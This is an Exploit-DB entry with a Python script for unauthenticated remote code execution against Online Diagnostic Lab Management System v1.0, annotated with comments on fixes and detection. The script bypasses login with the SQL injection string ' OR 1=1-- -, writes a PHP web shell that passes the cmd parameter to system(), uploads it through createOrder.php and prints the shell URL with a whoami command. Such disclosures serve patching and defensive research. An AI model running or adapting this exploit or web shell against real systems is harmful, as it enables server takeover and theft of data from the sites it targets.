[webapps] Online Diagnostic Lab Management System v1.0 - Remote Code Execution (...

source link: https://www.exploit-db.com/exploits/51045
Online Diagnostic Lab Management System v1.0 - Remote Code Execution (RCE) (Unauthenticated)

EDB-ID:

51045

EDB Verified:

Platform:

PHP

Date:

2023-03-25

Vulnerable App:

# Exploit Title: Online Diagnostic Lab Management System v1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Google Dork: N/A
# Date: 2022-9-23
# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11
# Vendor Homepage: https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/diagnostic_0.zip
# Tested on: windows 11 - XAMPP
# Version: 1.0
# Authentication Required: bypass login with sql injection

#/usr/bin/python3

import requests
import os
import sys
import time
import random

# clean screen
# Both clears are issued unconditionally; whichever one does not exist on the
# current platform just prints a "command not found" style message.
os.system("cls")
os.system("clear")

logo = '''
##################################################################
#                                                                                                                                            #
#    Exploit Script ( Online Diagnostic Lab Management System )                             #
#                                                                                                                                            #
##################################################################
'''
print(logo)

# Base URL of the target installation; every path below is appended to it
# literally, so a trailing slash here produces a double slash in the requests.
url = str(input("Enter website url : "))
# Step 1 - authentication bypass. The username is a SQL tautology
# (`' OR 1=1-- -`) and the password is arbitrary. For this to work the
# login query must be interpolating the submitted username into SQL text;
# the server-side fix is a parameterized/prepared statement in login.php plus
# a constant-time check of the password hash. From a detection standpoint a
# quote followed by `OR 1=1` in a login POST body is a high-confidence WAF /
# log-alert pattern.
username = ("' OR 1=1-- -")
password = ("test")

# A Session object is used so the cookie issued by login.php is replayed on
# the upload request below.
req = requests.Session()

target = url+"/diagnostic/login.php"
data = {'username':username,'password':password}

website = req.post(target,data=data)
# Step 2 - prepare the upload. rev.php is written to the operator's working
# directory and holds a one-line PHP stub that passes the `cmd` query
# parameter straight to system(). On the server side, a file containing a
# `<?php` opening tag under an image upload directory is the artifact to hunt
# for; the preventive controls are an extension/MIME allow-list, re-encoding
# uploaded images, storing uploads outside the web root (or with PHP
# execution disabled for that directory), and not trusting the client-supplied
# filename.
files = open("rev.php","w")
payload = "<?php system($_GET['cmd']);?>"
files.write(payload)
files.close()

# Random 128-bit file name; the .php extension is kept so the web server will
# execute the uploaded file. (`hash` shadows the Python builtin of the same
# name - harmless here since the builtin is never used afterwards.)
hash = random.getrandbits(128)
name_file = str(hash)+".php"
# Success is inferred purely from a substring of the login response body.
if "Login Successfully" in website.text:

    print("[+] Login Successfully")
    # The order-creation handler is used only as a file-upload sink. Every
    # business field is sent empty and only productImage carries content,
    # which suggests createOrder.php performs no server-side validation of
    # the form fields or of the uploaded file type before saving it.
    website_1 = url+"/diagnostic/php_action/createOrder.php"

    upload_file = {
        "orderDate": (None,""),
        "clientName": (None,""),
        "clientContact" : (None,""),
        "productName[]" : (None,""),
        "rateValue[]" : (None,""),
        "quantity[]" : (None,""),
        "totalValue[]" : (None,""),
        "subTotalValue" : (None,""),
        "totalAmountValue" : (None,""),
        "discount" : (None,""),
        "grandTotalValue" : (None,""),
        "gstn" : (None,""),
        "vatValue" : (None,""),
        "paid" : (None,""),
        "dueValue" : (None,""),
        "paymentType" : (None,""),
        "paymentStatus" : (None,""),
        "paymentPlace" : (None,""),
        # (filename, file object) tuple: the filename is the random .php name
        # chosen above; the handle opened here is never explicitly closed.
        "productImage" : (name_file,open("rev.php","rb"))
        }

    # The upload response is not inspected; the script assumes the handler
    # stores the file under assets/myimages/ using the client-supplied name
    # and simply prints where it expects it to be. A defender reconciling
    # this path: files in that directory that are not valid images, or whose
    # names are long decimal strings ending in .php, are indicators of this
    # technique.
    up = req.post(website_1,files=upload_file)
    print("[+] Check here file shell => "+url+"/diagnostic/assets/myimages/"+name_file)
    print("[+] can exect command here => "+url+"/diagnostic/assets/myimages/"+name_file+"?cmd=whoami")
else:
    # Either the marker string is absent (login hardened or different
    # version) or the response format differs; the script does not
    # distinguish the two.
    print("[-] Check username or password")
            
